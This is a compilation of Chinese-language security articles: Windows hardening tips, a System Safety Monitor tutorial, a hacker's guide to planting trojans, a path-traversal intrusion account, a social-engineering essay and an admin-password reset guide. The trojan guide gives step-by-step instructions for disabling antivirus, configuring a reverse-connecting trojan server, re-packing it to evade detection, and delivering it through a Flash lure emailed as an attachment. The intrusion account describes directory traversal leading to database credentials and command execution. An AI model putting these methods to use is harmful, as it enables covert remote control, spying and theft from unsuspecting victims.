　　黑客在入侵时常常会扫描你的计算机端口，如果安装了端口监视程序（比如Netwatch），该监视程序则会有警告提示。如果遇到这种入侵，可用工具软件关闭用不到的端口，比如，用“Norton Internet Security”关闭用来提供网页服务的80和443端口，其他一些不常用的端口也可关闭。

　　六、更换管理员帐户

　　Administrator帐户拥有最高的系统权限，一旦该帐户被人利用，后果不堪设想。黑客入侵的常用手段之一就是试图获得Administrator帐户的密码，所以我们要重新配置Administrator帐号。

　　首先是为Administrator帐户设置一个强大复杂的密码，然后我们重命名Administrator帐户，再创建一个没有管理员权限的Administrator帐户欺骗入侵者。这样一来，入侵者就很难搞清哪个帐户真正拥有管理员权限，也就在一定程度上减少了危险性。

　　七、杜绝Guest帐户的入侵

　　Guest帐户即所谓的来宾帐户，它可以访问计算机，但受到限制。不幸的是，Guest也为黑客入侵打开了方便之门！网上有很多文章中都介绍过如何利用Guest用户得到管理员权限的方法，所以要杜绝基于Guest帐户的系统入侵。

　　禁用或彻底删除Guest帐户是最好的办法，但在某些必须使用到Guest帐户的情况下，就需要通过其它途径来做好防御工作了。首先要给Guest设一个强壮的密码，然后详细设置Guest帐户对物理路径的访问权限。举例来说，如果你要防止Guest用户可以访问tool文件夹，可以右击该文件夹，在弹出菜单中选择“安全”标签，从中可看到可以访问此文件夹的所有用户。删除管理员之外的所有用户即可。或者在权限中为相应的用户设定权限，比方说只能“列出文件夹目录”和“读取”等，这样就安全多了。

　　八、安装必要的安全软件

　　我们还应在电脑中安装并使用必要的防黑软件，杀毒软件和防火墙都是必备的。在上网时打开它们，这样即便有黑客进攻我们的安全也是有保证的。

　　九、防范木马程序

　　木马程序会窃取所植入电脑中的有用信息，因此我们也要防止被黑客植入木马程序，常用的办法有：

　　● 在下载文件时先放到自己新建的文件夹里，再用杀毒软件来检测，起到提前预防的作用。

　　● 在“开始”→“程序”→“启动”或“开始”→“程序”→“Startup”选项里看是否有不明的运行项目，如果有，删除即可。　

　● 将注册表里 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run下的所有以“Run”为前缀的可疑程序全部删除即可。

　　十、不要回陌生人的邮件

　　有些黑客可能会冒充某些正规网站的名义，然后编个冠冕堂皇的理由寄一封信给你要求你输入上网的用户名称与密码，如果按下“确定”，你的帐号和密码就进了黑客的邮箱。所以不要随便回陌生人的邮件，即使他说得再动听再诱人也不上当。

　　做好IE的安全设置

　　ActiveX控件和 Applets有较强的功能，但也存在被人利用的隐患，网页中的恶意代码往往就是利用这些控件编写的小程序，只要打开网页就会被运行。所以要避免恶意网页的攻击只有禁止这些恶意代码的运行。IE对此提供了多种选择，具体设置步骤是：“工具”→“Internet选项”→“安全”→“自定义级别”，建议您将ActiveX控件与相关选项禁用。谨慎些总没有错！

　　另外，在IE的安全性设定中我们只能设定Internet、本地Intranet、受信任的站点、受限制的站点。不过，微软在这里隐藏了“我的电脑”的安全性设定，通过修改注册表把该选项打开，可以使我们在对待ActiveX控件和 Applets时有更多的选择，并对本地电脑安全产生更大的影响。

　　下面是具体的方法：打开“开始”菜单中的“运行”，在弹出的“运行”对话框中输入Regedit.exe，打开注册表编辑器，点击前面的“+”号顺次展开到：HKEY_CURRE-NT_USER\Software\Microsoft\Windows\CurrentVersion\InternetSettings\Zones\0，在右边窗口中找到DWORD值“Flags”，默认键值为十六进制的21(十进制33)，双击“Flags”，在弹出的对话框中将它的键值改为“1”即可，关闭注册表编辑器。无需重新启动电脑，重新打开IE，再次点击“工具→Internet选项→安全”标签，你就会看到多了一个“我的电脑”图标，在这里你可以设定它的安全等级。将它的安全等级设定高些，这样的防范更严密。

实用教程之玩转俄罗斯的系统监视器SSM

实用教程之玩转俄罗斯的系统监视器SSM

作者：Qoo酷儿　来源：电脑爱好者

不少读者对System Safety Monitor(以下简称为SSM)很感兴趣。它是一款俄罗斯出品的系统监控软件，通过监视系统特定的文件(如注册表等)及应用程序，达到保护系统安全的目的。在某些功能上比Winpatrol更强大。

　　安装并启动(可能需手动到安装目录中运行SysSafe.exe)SSM后，点击弹出的LOGO窗口中的Close this windows(关闭窗口)项，关闭该窗口。这时SSM已经启动，并开始进行监视，我们可以在系统托盘内看到软件图标。

SSM贴身保护你的Windows

　　SSM既然自称System Safety Monitor(系统安全监视器)，那么就要看看SSM的拿手绝活。

小提示　让它随Windows一同启动

　　只有让SSM随时启动才能起到监视和保卫系统安全的功效，因此要设置让其自动随Windows一同启动。右击系统托盘的软件图标，选择 Preferences(参数选项)，打开System Safety Monitor - Preferences窗口，点击Options(选项)标签。确认左侧所选为General(常规)，然后将右侧SSM Startup mode(SSM启动模式)项修改为Start automatically as aservice(以服务形式加载)(见图1)。



图1

1.打开SSM的监控

　　第一步:打开System Safety Monitor - Preferences窗口，点击Plugins(插件)标签。

　　第二步:确认Enable Plugins(激活插件)项已被勾选，这时SSM可以对Start Menu(“开始”菜单中的启动组)、Services(加载的系统服务)、Registry(注册表启动项)、INI Files(系统INI文件)及IExplore(IE)实施全方位监控(见图2)。



图2

2.任意添加监控项目

　　相比我们以前强烈推荐的Winpatrol，SSM更优秀之处在于可以“自定义”，比如想让SSM监视一个注册表中[HKEY_CLASSES_ROOT\.abs]下“默认”键的键值改动，你可以手工添加。

　　第一步:同样是在Plugins标签下，在窗口右侧选择Registry→Configuration。

　　第二步:在右侧窗格中右击，选择Add new item(添加新项目)，在弹出窗口的Path中输入HKEY_CLASSES_ROOT\.abr，在Name中输入“默认”，在Value中输入“默认”键键值的，即Photoshop.BrushesFile，在Value type下选择0 String即可。

　　第三步:设置完成后，当该键值被修改后，SSM就会弹出警告窗口(见图3)，按F2键可阻止修改，按F3键同意修改。



图3

　　对一个键值的修改已经如此，对于那些网络病毒就更能轻松解决。笔者曾用“证券大盗”等多款病毒对SSM进行测试，它都能轻松应对。

功能强大的程序监控



　　SSM另一强大而有用的监控就是应用程序监控，它能监控程序开启过程的一举一动。并且不管这个程序是以何种方式开启，无论是用户双击直接打开，还是由其他程序间接打开，甚至是由于系统漏洞而被悄悄执行的错误程序(包括病毒)，也不管这个程序是何种格式(EXE/DLL等)，SSM只要发现有新程序被开启，均会报告用户，最终由用户决定该程序是否运行。

1.实战SSM的程序监控

　　现在很多软件的安装程序，在给用户安装软件的同时，还会“默认”安装一些用户不需要的东西(广告/插件等)。一旦你安装了这种软件就同时在不知情之下往硬盘“塞垃圾”。这时，SSM就能发挥拦截作用了。

　　SSM默认是未开启程序监控，需要用户自行开启，方法很简单，只要右击系统托盘内软件图标，选择Watch App Activity(监视应用程序)即可。

　　笔者再运行含有广告插件的软件，如“QQ自动聊天器”，在安装时除了原程序，SSM提示还有新程序想运行。

　　在这里，SSM的程序监控对于程序开启提供五个不同的选择。所对应的快捷按键分别是F1到F5，每项都各有含义:F1是“总是允许”，F2是“总是阻止”，F3是“只允许系统管理员，不包括其他用户”，F4是“只允许这一次”(默认选项)，而F5是“只阻止这一次”，而这里自然要按F2或F5。

　　之后继续安装，但居然又出现了广告插件，自然使用相同方法将其拦截即可。

　　如果是病毒，SSM也同样不含糊:笔者空闲时也喜欢下载电子书看看。但如果下载下来的电子书是夹带了病毒，并且防病毒软件没有检测到怎么办？

　　不要紧，还有SSM。前段时间笔者从网下载了EXE格式的电子书，打开该电子书后，SSM的程序监控很自然请求用户选择，由于是要看书，所以是选择 F1、F3或F4通过啦，可是令人意外的是，又弹出SSM的警告，还有程序要运行，书打开了，自然是有问题，不管好坏先按下F2或F5阻止运行。

　　后经过分析发现原来这本电子书使用了加壳处理，并绑定了病毒，虽然绕过了病毒防火毒，但SSM是从不会让你失望的。

小提示

　　点击Scan项，可启动杀毒软件对程序进行杀毒。但要注意需要先在SSM中设置好杀毒软件目录，否则，这里会显示Locate。杀毒软件设置方法如下:打开System Safety Monitor - Preferences窗口，点击Options项，在窗口左侧点击Misc，然后在窗口右侧的Antivirus中设置即可(见图4)。



图4

2.添加修改应用程序规则

　　如果希望针对不同的程序设置不同规则，可以在SSM中进行详细设置。

　　第一步:打开System Safety Monitor - Preferences窗口，点击Application Rules(应用程序规则)标签。

　　第二步:这里列出了所有正在运行的程序，然后将Rule(规则)默认的Allowed(F3)修改为Blocked(F2)则会阻止该程序运行。

　　第三步:双击程序，可打开针对该程序的高级规则设置窗口，可进一步设置该程序是否能被其他软件所调用或是调用其他软件(见图5)。



图5

小提示　SSM在监控之外

★“黑名单”功能:如果不想别人使用你的MSN Messenger及Outlook Express，可以打开System Safety Monitor - Preferences窗口，点击Windows标签下的Filters项，添加上“MSN Messenger”(不含引号)及“收件箱 - Outlook Express”(不含引号)两项，再右击系统托盘SSM图标，勾选Filter windows captions(窗口标题过滤)项。

　　这样两个程序只要一打开就马上消失掉。你可根据自己的需要将其他程序窗口标题栏填到这里即可。

★导出配置文件:点击System Safety Monitor - Preferences窗口中Service标签下的Save current config file as备份你的配置文件，以便升级或重装时使用。

黑客如何给你的系统种木马

黑客如何给你的系统种木马

相信很多朋友都听说过木马程序，总觉得它很神秘、很高难，但事实上随着木马软件的智能化，很多骇客都能轻松达到攻击的目的。今天，笔者就以最新的一款木马程序——黑洞2004，从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是，在使用木马程序的时候，请先关闭系统中的病毒防火墙，因为杀毒软件会把木马作为病毒的一种进行查杀。

　　操作步骤:

　　一、种植木马

　　现在网络上流行的木马基本上都采用的是C/S 结构（客户端/服务端）。你要使用木马控制对方的电脑，首先需要在对方的的电脑中种植并运行服务端程序，然后运行本地电脑中的客户端程序对对方电脑进行连接进而控制对方电脑。

　　二、使用木马

　　成功的给别人植入木马服务端后，就需要耐心等待服务端上线。由于黑洞2004采用了反连接技术，所以服务端上线后会自动和客户端进行连接，这时，我们就可以操控客户端对服务端进行远程控制。在黑洞2004下面的列表中，随便选择一台已经上线的电脑，然后通过上面的命令按钮就可以对这台电脑进行控制。下面就简单的介绍一下这些命令的意义。

　　文件管理：服务端上线以后，你可以通过“文件管理”命令对服务端电脑中的文件进行下载、新建、重命名、删除等操作。可以通过鼠标直接把文件或文件夹拖放到目标文件夹，并且支持断点传输。简单吧？

　　进程管理：查看、刷新、关闭对方的进程，如果发现有杀毒软件或者防火墙，就可以关闭相应的进程，达到保护服务器端程序的目的。

　　窗口管理：管理服务端电脑的程序窗口，你可以使对方窗口中的程序最大化、最小化、正常关闭等操作，这样就比进程管理更灵活。你可以搞很多恶作剧，比如让对方的某个窗口不停的最大化和最小化。

　　视频监控和语音监听：如果远程服务端电脑安装有USB摄像头，那么可以通过它来获取图像，并可直接保存为Media Play可以直接播放的Mpeg文件；需要对方有麦克风的话，还可以听到他们的谈话，恐怖吧？

　　除了上面介绍的这些功能以外，还包括键盘记录、重启关机、远程卸载、抓屏查看密码等功能，操作都非常简单，明白了吧？做骇客其实很容易。

　　3 隐藏

　　随着杀毒软件病毒库的升级，木马会很快被杀毒软件查杀，所以为了使木马服务端辟开杀毒软件的查杀，长时间的隐藏在别人的电脑中，在木马为黑客提供几种可行的办法。

　　1.木马的自身保护

　　就像前面提到的，黑洞2004在生成服务端的时候，用户可以更换图标，并使用软件UPX对服务端自动进行压缩隐藏。

　　2.捆绑服务端

　　用户通过使用文件捆绑器把木马服务端和正常的文件捆绑在一起，达到欺骗对方的目的。文件捆绑器有广外文件捆绑器2002、万能文件捆绑器、exeBinder、Exe Bundle等。

　　3.制做自己的服务端

　　上面提到的这些方法虽然能一时瞒过杀毒软件，但最终还是不能逃脱杀毒软件的查杀，所以若能对现有的木马进行伪装，让杀毒软件无法辨别，则是个治本的方法。可以通过使用压缩EXE和DLL文件的压缩软件对服务端进行加壳保护。例如1中的UPX就是这样一款压缩软件，但默认该软件是按照自身的设置对服务端压缩的，因此得出的结果都相同，很难长时间躲过杀毒软件；而自己对服务端进行压缩，就可以选择不同的选项，压缩出与众不同的服务端来，使杀毒软件很难判断。下面我就以冰河为例，为大家简单的讲解一下脱壳（解压）、加壳（压缩）的过程。

　　如果我们用杀毒软件对冰河进行查杀，一定会发现2个病毒，一个是冰河的客户端，另一个是服务端。使用软件“PEiD”查看软件的服务端是否已经被作者加壳，可以看到服务端已经使用UPX进行了压缩。

现在，我们就需要对软件进行脱壳，也就是一种解压的过程。这里我使用了“UPXUnpack”，选择需要的文件后，点击“解压缩”就开始执行脱壳。

　　脱壳完成后，我们需要为服务端加一个新壳，加壳的软件很多，比如：ASPack、ASProtect、UPXShell、Petite等。这里以“ASPack”为例，点击“打开”按钮，选择刚刚脱壳的服务端程序，选择完成后ASPack会自动为服务端进行加壳。再次用杀毒软件对这个服务端进行查杀，发现其已经不能识别判断了。如果你的杀毒软件依旧可以查杀，你还可以使用多个软件对服务端进行多次加壳。笔者在使用Petite和ASPack对服务端进行2次加壳后，试用了多种杀毒软件都没有扫描出来。现在网络中流行的很多XX版冰河，就是网友通过对服务端进行修改并重新加壳后制做出来的。

　　为了避免不熟悉木马的用户误运行服务端，现在流行的木马都没有提供单独的服务端程序，而是通过用户自己设置来生成服务端，黑洞2004也是这样。首先运行黑洞2004，点击“功能/生成服务端”命令，弹出“服务端配置”界面。由于黑洞2004采用了反弹技术（请参加小知识），首先单击旁边的“查看”按钮，在弹出的窗口中设置新的域名，输入你事先申请空间的域名和密码，单击“域名注册”，在下面的窗口中会反映出注册的情况。域名注册成功以后，返回“服务端配置”界面，填入刚刚申请的域名，以及“上线显示名称”、“注册表启动名称”等项目。为了迷惑他人，可以点“更改服务端图标”按钮为服务端选择一个图标。所有的设置都完成后，点击“生成EXE型服务端”就生成了一个服务端。在生成服务端的同时，软件会自动使用UPX为服务端进行压缩，对服务端起到隐藏保护的作用。

　　服务端生成以后，下一步要做的是将服务端植入别人的电脑？常见的方法有，通过系统或者软件的漏洞入侵别人的电脑把木马的服务端植入其的电脑；或者通过Email夹带，把服务端作为附件寄给对方；以及把服务端进行伪装后放到自己的共享文件夹，通过P2P软件（比如PP点点通、百宝等），让网友在毫无防范中下载并运行服务端程序。

　　由于本文主要面对普通的网络爱好者，所以就使用较为简单的Email夹带，为大家进行讲解。我们使用大家经常会看到的Flash动画为例，建立一个文件夹命名为“好看的动画”，在该文件夹里边再建立文件夹“动画.files”，将木马服务端软件放到该文件夹中假设名称为“abc.exe”，再在该文件夹内建立flash文件，在flash文件的第1帧输入文字“您的播放插件不全，单击下边的按钮，再单击打开按钮安装插件”，新建一个按钮组件，将其拖到舞台中，打开动作面板，在里边输入“on (press) {getURL("动画.files/abc.exe");}”，表示当单击该按钮时执行abc这个文件。在文件夹“好看的动画”中新建一个网页文件命名为“动画.htm”，将刚才制作的动画放到该网页中。看出门道了吗？平常你下载的网站通常就是一个.html文件和一个结尾为.files的文件夹，我们这么构造的原因也是用来迷惑打开者，毕竟没有几个人会去翻.files文件夹。现在我们就可以撰写一封新邮件了，将文件夹“好看的动画”压缩成一个文件，放到邮件的附件中，再编写一个诱人的主题。只要对方深信不疑的运行它，并重新启动系统，服务端就种植成功了。

　　三、防范

　　防范重于治疗，在我们的电脑还没有中木马前，我们需要做很多必要的工作，比如：安装杀毒软件和网络防火墙；及时更新病毒库以及系统的安全补丁；定时备份硬盘上的文件；不要运行来路不明的软件和打开来路不明的邮件。

　　最后笔者要特别提醒大家，木马除了拥有强大的远程控制功能外，还包括极强的破坏性。我们学习它，只是为了了解它的技术与方法，而不是用于盗窃密码等破坏行为，希望大家好自为之。

　　小知识：

　　反弹技术，该技术解决了传统的远程控制软件不能访问装有防火墙和控制局域网内部的远程计算机的难题。反弹端口型软件的原理是，客户端首先登录到FTP服务器，编辑在木马软件中预先设置的主页空间上面的一个文件，并打开端口监听，等待服务端的连接，服务端定期用HTTP协议读取这个文件的内容，当发现是客户端让自己开始连接时，就主动连接，如此就可完成连接工作。

　　因此在互联网上可以访问到局域网里通过 NAT （透明代理）代理上网的电脑，并且可以穿过防火墙。与传统的远程控制软件相反，反弹端口型软件的服务端会主动连接客户端，客户端的监听端口一般开为80（即用于网页浏览的端口），这样，即使用户在命令提示符下使用“netstat -a”命令检查自己的端口，发现的也是类似“TCP　UserIP:3015　ControllerIP：http　ESTABLISHED”的情况，稍微疏忽一点你就会以为是自己在浏览网页，而防火墙也会同样这么认为的。于是，与一般的软件相反，反弹端口型软件的服务端主动连接客户端，这样就可以轻易的突破防火墙的限制

通配符的魔力—轻装入侵个人主页空间

最近学习ASP，想申请一个免费空间。找到一个满意的一看，限制还真不少，不但最多只能放30MB的文件，单个上传文件还不能超过1.5MB，而且也不支持ASP。这怎么行呢?严重打击我学习的积极性。于是我就想能不能突破网站的限制。

　　首先用X-Scan2.3扫描，不一会儿结果出来了，有用的信息有：“Windows 2000操作系统，139端口开放”、“80端口开放，Web服务器用的是IIS”、“1433端口开放，用的是MS SQL Server”、“3389远程管理端口在开启状态”。

　　看来只有对Web下手了。观摩了一下这个PHP个人主页系统，不管了，先用简单的办法碰碰运气。用自己的账号和密码登录进去，(这是一个Web方式管理的个人主页系统，不支持FTP)，在个人主页根目录下建立一个rich4文件夹，把自己曾玩过的save1.dat(游戏记录文件)传上去。这时我看到IE的地址栏变成了：“http://***.php?action=chdr&file=%2Frich4”，看到这个地址的奇怪之处没有，我把rich4文件名改成“/.”，地址栏就成了“http://***.php?action=chdr&file=%2F/.”。再接再厉，把“/..”改成“/../..”即“***.php?action=chdr&file

　　=%2F/../..”居然看到了Recycled目录。看来进入硬盘根目录下了。这个硬盘有不少文件夹，有个人主页目录Free(这个目录下放着很多个人主页的文件夹)，还有一个备份目录。有什么呢?进去看看，在admin子目录中有个global.asa文件，点击编辑，哈哈，果然看到账户了。后面的过程就不说了。

　　后记：

　　其实这个免费主页空间的管理员还是有一定安全意识的(Windows 2000系统安装在C盘，IIS安装在D盘，个人主页安装在F盘)。问题出在什么地方呢?

　　1.个人主页采用PHP系统，但是没有过滤“/”、“.”等特殊符号，所以可以遍阅F盘下的任何文件;

　　2.个人主页后台管理系统采用ASP系统，放在D盘下，但是居然在F盘里放了一个备份，让我阅读了global.asa文件，看到了MS SQL Server的“sa”账户密码;

　　3.没有取消“sa”账号的远程连接，也没有删除xp_cmdshell，使得我可以执行cmd本地命令。

什么是社会工程学？

什么是社会工程学？

总体上来说，社会工程学就是使人们顺从你的意愿、满足你的欲望的一门艺术与学问。它并不单纯是一种控制意志的途径，但它不能帮助你掌握人们在非正常意识以外的行为，且学习与运用这门学问一点也不容易。

　　它同样也蕴涵了各式各样的灵活的构思与变化着的因素。无论任何时候，在需要套取到所需要的信息之前，社会工程学的实施者都必须：掌握大量的相关知识基础、花时间去从事资料的收集与进行必要的如交谈性质的沟通行为。与以往的的入侵行为相类似，社会工程学在实施以前都是要完成很多相关的准备工作的，这些工作甚至要比其本身还要更为繁重。

　　你也许会认为我们现在的论点只是集中在证明“怎样利用这种技术也能进行入侵行为”的一个突破口上。好了，其实这样够公平的了。无论怎么说，“知道这些方法是如何运用的”也是唯一能防范和抵御这类型的入侵攻击的手段了。从这些技术中提取而得出的知识可以帮助你或者你的机构预防这类型的攻击。在出现社会工程学攻击这类型攻击的情况下，像CERT发放的、略带少量相关信息的警告是毫无意义的。它们通常都将简单地归结于：“有的人通过‘假装某些东西是真的’的方式去尝试访问你的系统。不要让他们得逞。”然而，这样的现象却常有发生。

　　那又如何呢？

　　社会工程学定位在计算机信息安全工作链路的一个最脆弱的环节上。我们经常讲：最安全的计算机就是已经拔去了插头（注释：网络接口）的那一台（注释：“物理隔离”）。真实上，你可以去说服某人（注释：使用者）把这台非正常工作状态下的、容易受到攻击的（注释：有漏洞的）机器接上插头（注释：连上网络）并启动（注释：提供日常的服务）。

　　也可以看出，“人”这个环节在整个安全体系中是非常重要的。这不像地球上的计算机系统，不依赖他人手动干预（注释：人有自己的主观思维）。由此意味着这一点信息安全的脆弱性是普遍存在的，它不会因为系统平台、软件、网络又或者是设备的年龄等因素不相同而有所差异。

　　无论是在物理上还是在虚拟的电子信息上，任何一个可以访问系统某个部分（注释：某种服务）的人都有可能构成潜在的安全风险与威胁。任何细微的信息都可能会被社会工程学使用者用着“补给资料”来运用，使其得到其它的信息。这意味着没有把“人”（注释：这里指的是使用者/管理人员等的参与者）这个因素放进企业安全管理策略中去的话将会构成一个很大的安全“裂缝”。

　　一个大问题？

　　安全专家常常会不经意地把安全的观念讲得非常的含糊，这样会导致信息安全上的不牢固性。在这样的情况下社会工程学就是导致不安全的根本之一了。我们不应该模糊人类使用计算机或者影响计算机系统运作这个事实，原因我在之前已经声明过了，地球上的计算机系统不可能没有“人”这个因素的。几乎每个人都有途径去尝试进行社会工程学“攻击”的，唯一的不同之处在于使用这些途径时的技巧高低而已。

　　方法

　　试图驱使某人遵循你的意愿去完成你想要完成的任务是可以有很多种方法的。第一种方法也是最简单明了的方法，就是目标个体被问到要完成你的目的时给予其一个直接的“指引”了。毫无疑问这是最容易成功的，也是最简单与最直观的方法了。当然，被指引的个体也会清楚地知道你想他们干些什么。

　　第二种就是为某个个体度身订造一个人为的（注释：通过捏造的手段）特定情形/环境。这种方法比你仅仅需要考虑到了某个个体的相关信息状况附带更多的因素，例如如何说服你的对象，你可以设定（注释：刻意安排）某个理由/动机去迫使其为你完成某个非其本身意愿的行为结果。这包括了远至于为某个特定的个体创造一个有说服力的企图而进行的工作，与大量你想得到的“目标”的相关知识。这意味着那些特定的情况/环境必须建立在客观事实的基础上。少量的谎言会使效果更好一些。

　　社会工程学中最精炼的手段之一就是针对现实事物的良好记忆能力。在这个问题上黑客与系统管理员会更为侧重一点，特别是在某种事物与他们的领域有所关联的情况下。为了说明上述的方法，我准备列举一个小型的范例.......

　　[范例如下，当你把某个个体“置于”群体/社会压力（注释：其类型如舆论压力等）下的处境/形势时，个体很有可能会做出符合群体决定的行为，尽管这个决定很明显是错误的。]
一致性

　　若在某些情况下有人坚信他们群体的决定是对的话，那么这将有可能导致他们做出不同于往常的判断/行为。比方说如果我曾发表过某个结论，论点的理由非常充分（注释：这里指的是符合群体中多数人的意愿），那么往后无论我花多大的精力去尝试说服他们，都不可能令他们再改变自己的决定了。

　　另外，一个群体是由不同位置/层次的成员组成的。这个位置/层次问题被心理学者称之为“demand charac-teristics”（注释：“意愿的特征性”），这个位置/层次问题在参与者的行为上受其浓厚的社会约束性所影响。不希望得罪其他的成员的、不想被其他人看出自己在会议中想睡觉的、不想破坏与自身关系良好的伙伴的观点等的心态最终都会成为“随波逐流”现象的形成因素。这种运用到特征的处理方式是引导人们行为的一种有效途径。

　　情形

　　无论怎么说，大多数的社会工程学行为都是被一些单独的个体所运用的，因此诸如社会压力与其它的一些影响因素都必须建立在和目标有一定的可信关系的情况下进行的。

　　如果处于这样的情形下，当有了真实或者虚构出来的固有特征时目标个体就很可能会遵循你的意愿而工作了。这些固有特征包括：

　　目标个体以外的压力问题。如让个体相信某个行为的后果并不是他一个人的责任。

　　借助机会去迎合某人。这些行为更多取决于此个体是否认为某个决定能为某人带来“好处”。这样的行为可以使你与老板的关系更为融洽。

　　道德上的责任。个体会遵从你是因为他们觉得自己（注释：在道德上）有义务这么做。这就是利用了内疚感。人们比较愿意逃避内疚感，因此如果有一个“可能”会让他们觉得有内疚感的话他们都会尽可能地去避免这个“可能”。

　　个人的说服力

　　个人的声望/说服能力是一种常被用于促使某人配合/顺从你的有利手段。使用个人说服力的目的并不是要别人强行接受你所指派的“任务”，而是增强他们对完成你所指派的任务的主动顺从意识。

　　其实这是有些矛盾的。基本上，目标只是被我们简单地引导到一个已经设置好的、特定的（注释：故意安排的）思维模式上去。目标会认为他们可以控制住局面，在此同时他们也通过他们的力量帮助了你。

　　事实上，目标所得到的利益与他间接帮助你得到的利益此两者是没有冲突的。社会工程学使用者的目的是说服目标，使其有充分的理由去相信只需花费小量的时间与精力就可以“换取”得到利益了。

　　合作

　　存在着多个因素可以促使一个社会工程学使用者增加与目标“合作”的机会。

　　尽量少与目标发生冲突。使用平和的态度去面对对方可以提高达成目的成功几率。拉拢关系或者发展新的关系，共同的烦恼又或者是一些比较特殊的任务都可以有效地迫使目标与你合作。

　　在这里‘走向成功’的因素往往集中在你是否有能力去掌握与处理好你的说服力。这是非常重要的，这一点常被“骗子”（注释：常常使用欺骗手段的人）认为是万试万灵的手段。心理学研究指出如果人们先前曾经遵照过某个极小的指引而工作（注释：并获得成功）时现在他/她就更可能会去遵照一个更大的（注释：指引）了。在这里如果曾有过合作的前科的话，那么这次再合作，达成的机会就很大了。

　　更好的方法是让社会工程学者给予合作对象一些比较敏感的信息。尤其是一些非常逼真的视听感观，目标能够现场看到或听到你给他们的信息要比他们仅仅可以通过电话听到你的声音更能令他们信服。这个观点一点也不稀奇，以书写形式或电子方式进行交流的信息是很难让人信服的。这就如同拒绝某人进行某个IRC风格的通信一样。
关联

　　不管怎么说，社会工程学运用是否能成功也有取决于目标个体与你的目的有多大关联的因素的。我们可以说系统管理员、计算机安全执行官、技术研究人员、那些依靠计算机/网络进行工作又或者通过其进行通信的人与大多数黑客使用社会工程学进行攻击的目标都是有莫大的关联的。

　　有高度关联性的个体大多会被强而有利的论据所说服。事实上你可以给予他们更多强而有利的论据来支持你的观点。当然，那些观点也有薄弱的一面。你是否将论点薄弱的一面展现给有高度关联的人知道将极大可能地决定你是否能说服此人。当某人有可能直接被社会工程学攻击所影响，若此时出现薄弱的论据将有可能会导致其思想上产生“相反”的意识。所以面对与你的目的有关联的人时你必须给予强而有力的论据，而避免出现理由薄弱的论据。

　　相对于对你的指引或你想得到的结果并不敢兴趣的人，你可以把他们列入“低关联的人”这个类别中去。相关的例子如：一个网络系统机构中的保安人员、清洁工人、又或者是前台接待小姐等。因为低关联类别的个体并不会直接对你的目的/结果造成影响，而且他们往往不会去分析你用来说服他们的论点的双面性问题。他们的决策往往会遵循你的意愿又或者是完全不受其它的“意识”所影响。这些的“意识”如：社会工程学所提供的理由、表面形势上的迫急性又或者是在某人强烈的说服下。凭经验而论，在这样的情况下我们只能尽可能地给予其更多的论据与理由了，估计这样的效果会更好一些。基本上，对于那些与你的意识不一致的人，试图用大量的论据和指引去说服他们更胜于他们与你的目的的关联程度。

　　有一点是需要注意的：在进行某些工作的时候，能力低的个体更多会去仿效能力高的个体的行为模式。在计算机系统管理方面，“能力低的个体”大多是指上文所提到的“低关联的人”。站在上述的观点上考虑，不要试图对系统管理员这类别的个体进行社会工程学攻击，除非其能力不及你，不过这样的可能性非常的低。

　　防御他人的攻击

　　综合上述的资料能否让读者更好地保障他们整个计算机系统的安全呢？其实踏出“美好的”第一步就是要视乎员工们能否在自己的工作岗位上保障自己的计算机系统的信息安全。这不但需要你无条件地增强他们的安全防范意识，而且你自身也必须具备更高的警惕性。打个比方，如果你让某人专门负责保护你的计算机系统安全的话，那么就有便利于那个人在没有正常许可的情况下访问你系统的可能了。

　　无论如何，对付与防御这类型攻击的最有效手段，也作为最常见的手段，就是“教育/培训”了。第一步是教育你的雇员与那些有可能被利用作为社会工程学实施目标的人关于计算机/信息安全的重要性。直接给予容易攻击的人们一些预先的警告已经足以让他们去辨认社会工程攻击了。不过要记着，在教育他们计算机信息安全的时候可以使用一些故事及其“双面性”来作为例子。这并不是我自己的个人喜好哦。当个体明白了这个焦点的“双面性”以后他们基本上就不会动摇他们所处的立场了。而且如果他们是专注于计算机安全技术的话，那么他们更有可能会站在维护你的数据安全的立场上。

　　也有不会遵从人们的说服力倾向而作出行动的思维因素的。在这里你必须有清晰的思维、高度的创造力、可以应付和处理压力的能力与适当的自信。压力的处理能力与自信可以通过后天培养。至于自身的主张和见解常常被用于对员工的管理方面，训练它可以减少某些个体被施行社会工程学攻击的机会，也有助于其他方面的工作。

　　了解各种使人们的信息安全意识降低与威胁你的安全策略的因素。其实这方面只需要投入小量的精力就可以在降低安全风险方面产生很大的成效了。

　　结论

　　与普遍的思想观念相反，运用社会工程学捕捉人们的心理状态的技巧要比入侵一个sendmail容易得多。但如果你想让你的员工去预防与检测社会工程学攻击的话，其效果绝对不会比你让他们去维护UNIX系统安全的效果明显。

　　站在系统管理员的立场上，不要让“人之间的关系”问题介入你的信息安全链路之中，以至于让你的努力前功尽弃。站在黑客的立场上呢，当系统管理员的“工作链”上存放有你所需要的数据时，千万不要让他“摆脱”自身的脆弱环节。

小心被深山红叶破解Windows管理员密码

小心被深山红叶破解Windows管理员密码

作者：smtk　来源：赛迪网安全社区

【编者按：系统密码忘记了，可以借助工具进入。那么反过来，这个工具也会被某些别有用心的人所利用。攻防之道，存乎一心，看来这类的话题仍将继续。】

Windows NT、2000、XP的安全性能较之9x有很大提高，可是凡事有利必有弊，如果我们不慎忘记了管理员密码，那么要进入系统可不是一件容易的事。好在，我们现在有了深山红叶这款集成许多超强工具的Windows PE系统，可以让我们进不了系统的时候另辟蹊径，曲径通幽。

用深山红叶光盘启动电脑，按1进入超级工具箱，即可启动Windows PE系统，其界面与Windows XP相差无几，点“开始”菜单—常用软件—修改系统用户密码（sala's Password renew 1.0-RC1）（图1）。

（图1）

进入密码修改界面（图2）。

（图2）

点击最下端右侧的“elect target window”，选择要破解的操作系统所在的磁盘目录（如c:\windows），单击确定，此时，软件界面会出现“Startup”、“Renew existing user password”、“Create new Administrator user”、“Turn existing user to Administrator”4个选项（图3）。

（图3）

分别表示：开始、重设已存在的用户密码、新建一个管理员账号、将已存在的用户转为管理员。建议点击“Renew existing user password”项，选择管理员账号（Administrator），在“New Password”和下面的文本框中输入两次新的密码（注意：由于软件自身的原因，第二个文本框只显示了一部分，在“New Password”中输入了密码后按一下Tab键，即可进入下一个文本框，完成密码验证输入），点击页面下方出现的Install按钮，弹出提示框“Password Renew for NTs is successfuly done!”（图4）。

（图4）

点击“OK”按钮，即完成了管理员密码的重设。如果不放心，可以再重建一个管理员账号，并记住密码。重新启动电脑，即可以用新的密码进入系统，或者用新的管理员账号进入系统了。

